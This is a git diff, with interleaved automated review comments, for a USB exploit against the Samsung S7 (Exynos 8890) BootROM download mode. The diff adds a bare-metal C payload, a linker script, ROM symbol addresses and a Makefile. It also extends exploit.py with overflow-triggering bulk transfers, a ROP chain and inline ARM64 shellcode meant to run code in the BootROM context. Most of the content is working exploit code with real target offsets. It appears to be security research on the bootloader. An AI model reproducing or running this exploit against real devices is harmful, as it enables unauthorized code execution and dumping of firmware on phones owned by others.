diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..28d2fe1
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,17 @@
+ifeq ($(ANDROID_NDK_ROOT),)
+$(error Error : Set the env variable 'ANDROID_NDK_ROOT' with the path of the Android NDK (version 20))
+endif
+
+CC := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android27-clang
+AR := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ar
+OBJCOPY := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy
+LD := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ld.bfd
+
+#==================Target Samsung S7 (8890)==================
+CFLAGS_SAMSUNGS7 = -Os
+
+dwc3:
+ $(CC) entry.S -c -o entry.o $(CFLAGS_SAMSUNGS7)
+ $(CC) $(CFLAGS_SAMSUNGS7) -c test_dwc3.c -o dwc3.o
+ $(LD) -T test_dwc3.ld entry.o dwc3.o -o dwc3.elf --just-symbols=symbols.txt
+ $(OBJCOPY) -O binary dwc3.elf dwc3.bin
diff --git a/dwc3.bin b/dwc3.bin
new file mode 100755
index 0000000..e800078
Binary files /dev/null and b/dwc3.bin differ
diff --git a/dwc3.elf b/dwc3.elf
new file mode 100755
index 0000000..61b2b6f
Binary files /dev/null and b/dwc3.elf differ
diff --git a/dwc3.o b/dwc3.o
new file mode 100644
index 0000000..aff8e12
Binary files /dev/null and b/dwc3.o differ
diff --git a/entry.S b/entry.S
new file mode 100644
index 0000000..5dea2d7
--- /dev/null
+++ b/entry.S
@@ -0,0 +1,2 @@
+start:
+ b main
\ No newline at end of file
diff --git a/entry.o b/entry.o
new file mode 100644
index 0000000..0c578ca
Binary files /dev/null and b/entry.o differ
diff --git a/exploit.py b/exploit.py
index 65adbf7..0275fd9 100644
--- a/exploit.py
+++ b/exploit.py
@@ -1,6 +1,8 @@
 import usb.core
 import usb.util
-import struct, sys, usb1, libusb1, ctypes
+import struct, sys, usb1, libusb1, ctypes, usb
+from keystone import *
+from capstone import *
 # from ghidra_assistant.utils.utils import *
 def p32(x):
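Review bot: `CFLAGS_SAMSUNGS7 = -Os` is the only flag given to an NDK compiler that targets Android userspace, yet the object is then linked bare with `ld.bfd -T test_dwc3.ld` and no libc; at `-Os` clang is free to turn the byte-copy loop in test_dwc3.c into a `memcpy` call, to use FP/SIMD registers, and (the NDK default is `-fstack-protector-strong`) to reference `__stack_chk_guard` as soon as a local array appears, each of which either fails the bare link or, for FP use, presumably faults inside the BootROM context. Suggest `CFLAGS_SAMSUNGS7 = -Os -ffreestanding -fno-builtin -fno-stack-protector -mgeneral-regs-only` so the build fails loudly instead of depending on what the optimiser happens to emit. The host triple `linux-x86_64` is hard-coded into all four tool paths; fine for a PoC, but worth `# host prebuilt dir is Linux-only; use darwin-x86_64 on macOS`. The outputs `dwc3.o`, `dwc3.elf`, `dwc3.bin` and `entry.o` are committed next to this Makefile that regenerates them, so they belong in a `.gitignore` unless shipping a prebuilt for people without the NDK is intended, in which case say so in a comment.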
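Review bot: `start` in entry.S is neither `.globl` nor named by an `ENTRY()` directive in test_dwc3.ld, so nothing in the build ties `b main` to offset 0 of dwc3.bin; it lands there only because entry.o precedes dwc3.o on the Makefile link line, and `ld.bfd` will warn about a missing `_start`. Add `.section .text` and `.globl start` above the label so the linker script can reference it. A one-line comment is also warranted, since `b main` runs the C code on whatever SP the hijacked ROM context left behind and sets up nothing: `// no stack/BSS setup: SP and memory state are inherited from the ROM code that returned here`.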
@@ -27,7 +29,7 @@ BOOTROM_SIZE = 0x20000 #128Kb TARGET_OFFSETS = { # XFER_BUFFER, RA_PTR, XFER_END_SIZE - "8890": (0x02021800, 0x02020F08, 0x02070000), + "8890": (0x02021800, 0x02020F08, 0x02070000), "8895": (0x02021800, 0x02020F18, 0x02070000) } @@ -72,6 +74,26 @@ class ExynosDevice(): res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0) assert(res == 0) return transfered + + def test_bug_2(self): + # Also bug here + # payload = p32(1) + p32(CHUNK_SIZE + 0x2001) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) + # self.write(payload, MAX_PAYLOAD_SIZE) + # self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE) + + transferred = ctypes.c_int() + bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) + bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload)) + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0) + assert res == 0 + + payload = b"\xaa" * 0x200 + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) + assert res == 0 + + payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200)) + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) + pass def test_bug(self): # Start by sending a valid packet 
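Review bot: The third `libusb_bulk_transfer` in `test_bug_2` drops `res` and the method then falls through to `pass`, so a failed or short final send is indistinguishable from success; the first two sends check `res` but, unlike `test_bug` below, never compare `transferred.value` with the length actually handed over. The length expression `0x401 - (MAX_PAYLOAD_SIZE - 0x200)` goes negative as soon as `MAX_PAYLOAD_SIZE` (defined outside this hunk) exceeds 0x601, and `b"\xaa" * <negative>` silently yields `b""`, i.e. a zero-length transfer rather than an error. Replace the trailing `pass` with `assert res == 0 and transferred.value == len(payload), "short final send"` and guard the remainder with `assert len(payload) > 0, "remainder underflow"` (or derive it from the size declared in the header). The commented-out variant at the top of the method is dead code; a one-line note saying what it used to trigger would read better than the three commented statements.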
@@ -109,11 +131,6 @@ class ExynosDevice(): assert transferred.value == len(bug_payload), "Invalid transfered size" current_offset += len(bug_payload) - 8 # Remove header - # Send the actual payload - # res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) - # assert res == 0, "Error sending payload" - # current_offset += len(payload) - cnt = 0 while True: if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]: 
@@ -138,18 +155,129 @@ class ExynosDevice(): rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2) transferred = ctypes.c_int(0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) - # assert transferred.value == len(rop_chain), "Error sending ROP chain" + assert res == 0, "Error sending ROP chain" - buf = ctypes.c_buffer(b"", 0x200000) - res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000) + # Send some data + p = b"\xaa" * 0x200 + transferred.value = 0 + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100) + buf = ctypes.c_buffer(b"", 0x20000) + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100) + # Should have received some bytes pass +ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN) +def usb_debug(): + shellcode = f""" + start: + adr x0, test_fun + ldr x0, [x0] + blr x0 + + mov w1, #0x20000 // size + mov w0, #0x0 // address + bl usb_send + mov x0, #0 + br x0 //reset + + #Setup read usb + mov w0, #0x2 + adr x1, shellcode_base + ldr x1, [x1] + mov w2, #0x02020000 + add w2, w2, #0x2000 + # endpoint, cb, buffer + adr x5, maybe_usb_setup_read + ldr x5, [x5] + blr x5 + + + # Get something?? 
arg0 is endpoint + mov w0, #0x2 + adr x1, maybe_read_size_endpoint + ldr x1, [x1] + blr x1 + + + # # Send some data from ROM + # mov w1, #0x200 // size + # mov w0, #0x0 // address + # bl usb_send + # mov x0, #0 + # br x0 //reset + + + # # dwc3_ep0_start_trans + # mov w1, w0 + # mov w0, #0x2 + # mov w2, #0x200 + # adr x5, dwc3_ep0_start_trans + # ldr x5, [x5] + # blr x5 + + # # Send some data from ROM + # mov w1, #0x200 // size + # mov w0, #0x0 // address + # bl usb_send + # mov x0, #0 + # br x0 //reset + + usb_send: + stp x29, x30, [sp,#-48]! + mov w3, #0x0 + bfxil w3, w1, #0, #24 + mov w1, #0xc12 + mov x29, sp + stp x19, x20, [sp,#16] + mov x5, #0xc834 + mov w20, #0x1 + movk x5, #0x1540, lsl #16 + ldr x2, [x29,#40] + mov x4, #0xc838 + orr w6, w1, w20 + movk x4, #0x1540, lsl #16 + mov x19, #0xc83c + movk x19, #0x1540, lsl #16 + stp w3, w1, [x2,#8] + mov w3, #0x406 + stp w0, wzr, [x2] + mov w0, w20 + ldr x1, [x29,#40] + strb w6, [x2,#12] + mov x2, #0x27c8 + str w1, [x5] + mov w1, #0x1388 + str wzr, [x4] + str w3, [x19] + blr x2 + mov w0, w20 + ldr w1, [x19] + ldp x19, x20, [sp,#16] + ldp x29, x30, [sp],#48 + ret + + usb_read_endpoint: .quad 0x00006654 + maybe_usb_setup_read: .quad 0x00006f88 + shellcode_base: .quad 0x02021800 + maybe_read_size_endpoint: .quad 0x00007a7c + dwc3_ep0_start_trans: .quad 0x0000791c + test_fun: .quad 0x000064e0 +""" + shellcode = ks.asm(shellcode, as_bytes=True)[0] + + shellcode = open("dwc3.bin", "rb").read() + + exynos = ExynosDevice() + exynos.exploit(shellcode) if __name__ == "__main__": + usb_debug() + sys.exit(0) # wait_for_device() exynos = ExynosDevice() + exynos.test_bug_2() path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin" # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin" exynos.exploit(open(path, "rb").read()) diff --git a/symbols.txt b/symbols.txt new file mode 100644 index 0000000..ce55876 --- /dev/null +++ b/symbols.txt 
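Review bot: In `usb_debug` the keystone-assembled `shellcode` is overwritten on the very next line by `shellcode = open("dwc3.bin", "rb").read()`, so the entire inline assembly (including `usb_send`, whose `ldr x2, [x29,#40]` reads a slot of its own freshly reserved 48-byte frame that nothing stored to, presumably lifted from a ROM routine with a different prologue) is dead and `Ks`/`from keystone import *` only adds an import-time dependency; either drop it or select between the two with a flag, and open the file with `with open("dwc3.bin", "rb") as f: shellcode = f.read()` so the handle is not leaked. In `exploit` (whose body begins above this hunk) the two new bulk transfers ignore `res`, the IN endpoint is hard-coded as `0x81` where the removed line used `ENDPOINT_BULK_IN` (presumably the same value), and neither `buf` nor `transferred.value` is ever read, so the "Should have received some bytes" comment is never verified and whatever the ROM sent back is discarded. Add `assert res == 0 and transferred.value > 0, "no data from target"` and persist `buf.raw[:transferred.value]` to a file, otherwise the dump path has no observable output. Finally `usb_debug()` followed by `sys.exit(0)` at the top of `__main__` makes the `test_bug_2()` call and the bootrom-dump path below it unreachable; keep one entry point or gate them on `sys.argv`.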
@@ -0,0 +1,5 @@
+maybe_usb_setup_read = 0x00006f88;
+dwc3_ep0_start_trans = 0x0000791c;
+usb_event_handler = 0x00007bac;
+get_endpoint_buffer = 0x00007a7c;
+sleep = 0x000027c8;
\ No newline at end of file
diff --git a/test_dwc3.c b/test_dwc3.c
new file mode 100644
index 0000000..eb14a87
--- /dev/null
+++ b/test_dwc3.c
@@ -0,0 +1,57 @@
+#include
+
+// Create external function at 0x00006f88
+extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer);
+extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len);
+extern int usb_event_handler(void);
+extern void * get_endpoint_buffer(char endpoint);
+extern void sleep(int endpoint,uint32_t timeout);
+
+#define recv_buffer 0x02021800 + 0x2000
+#define data_received 0x02021800 + 0x2004
+
+// do {
+// /* loops until image has been received */
+// usb_event_handler();
+// iVar2 = download_ready?(); #TODO, set some global to indicate readyness
+// } while (iVar2 == 0);
+
+void recv_data_cb(uint32_t endpoint, uint32_t len){
+ void *rbuf;
+ void *dest_buf = (void *)recv_buffer;
+ volatile void *dref = (void *)data_received;
+
+ for(int i= 0; i < len; i++){
+ rbuf = get_endpoint_buffer(2);
+ *(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
+ }
+ // while(1){}
+ // asm("mov x0, #0x0");
+ // asm("br x0");
+ *(uint8_t *)dref = 3;
+}
+
+void recv_data(){
+ // Set data_received to 0
+ // uint32_t *r = (uint32_t *) data_received;
+ // r = 0;
+ volatile void *dref = (void *)data_received;
+ *(uint8_t *)dref = 0;
+
+ maybe_usb_setup_read(2, recv_data_cb, 1);
+ while(1){
+ usb_event_handler();
+ if(*(uint8_t *)dref == 3){
+ break;
+ }
+ sleep(1, 10);
+ }
+}
+
+int main() {
+ recv_data();
+ // recv_data();
+ // sleep(1, 5000);
+ asm("mov x0, #0x0");
+ asm("br x0");
+}
diff --git a/test_dwc3.ld b/test_dwc3.ld
new file mode 100644
index 0000000..d2991ee
--- /dev/null
+++ b/test_dwc3.ld
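Review bot: `recv_data_cb` never advances `dest_buf`, so all `len` bytes of the transfer are written to the same address and only the last one survives, and `(int)rbuf + i` truncates a 64-bit pointer to 32 bits before the add. Once the copy does advance, `data_received` at `recv_buffer + 4` is inside the staging area, so any transfer longer than four bytes clobbers the completion flag that `recv_data` polls; move the flag outside the buffer and bound `len` (it comes from the USB side and is attacker-controlled) before copying. `volatile void *dref` loses its qualifier at every `*(uint8_t *)dref` cast, so neither the poll in `recv_data` nor the store here is a volatile access; declare it `volatile uint8_t *`. The two unparenthesised macros (`#define recv_buffer 0x02021800 + 0x2000`) only work because they are cast to pointer first, and the `#include` target is missing in this rendering (presumably `<stdint.h>`, since `uint32_t` is used); the two separate `asm("mov x0, #0x0"); asm("br x0");` statements in `main` also declare no clobber, so the compiler may legally schedule code between them — fold them into one `asm volatile("mov x0, #0\n\tbr x0" ::: "x0")`.
```c
#define recv_buffer   (0x02021800 + 0x2000)
#define data_received (0x02021800 + 0x2004)

void recv_data_cb(uint32_t endpoint, uint32_t len){
    char *dest_buf = (char *)recv_buffer;
    volatile uint8_t *dref = (volatile uint8_t *)data_received;
    /* TODO: clamp len to what the staging area can hold before copying */
    for(uint32_t i = 0; i < len; i++){
        const char *rbuf = get_endpoint_buffer(2);
        dest_buf[i] = rbuf[i];
    }
    /* … unchanged: commented-out debug stubs … */
    *dref = 3;
}
```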
@@ -0,0 +1,14 @@
+MEMORY {
+ ROM (rwx): ORIGIN = 0x02021800, LENGTH = 0x1000
+}
+
+SECTIONS
+{
+ . = 0x02021800;
+ .text . : {
+ *(.text*)
+ *(.data*)
+ *(.rodata*)
+ } >ROM
+
+}
\ No newline at end of file
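Review bot: The script has no `ENTRY()` and does not pin entry.o's code first, so `b main` sits at offset 0 of the flat binary only because `*(.text*)` keeps input order and the Makefile lists entry.o before dwc3.o; a reordered link line would silently put a C function at the entry address. Put `entry.o(.text*)` on its own line ahead of `*(.text*)` and add `ENTRY(start)` (once `start` is exported from entry.S) so the intent is enforced by the linker rather than by argument order. The region is named `ROM` but is declared `rwx` and the C code writes into RAM just past it, which is confusing; `RAM` or `SHELLCODE` would be clearer. `.bss*`/`COMMON` are not placed anywhere, which is harmless only while test_dwc3.c has no zero-initialised globals — a comment saying so would stop the next change from tripping over it.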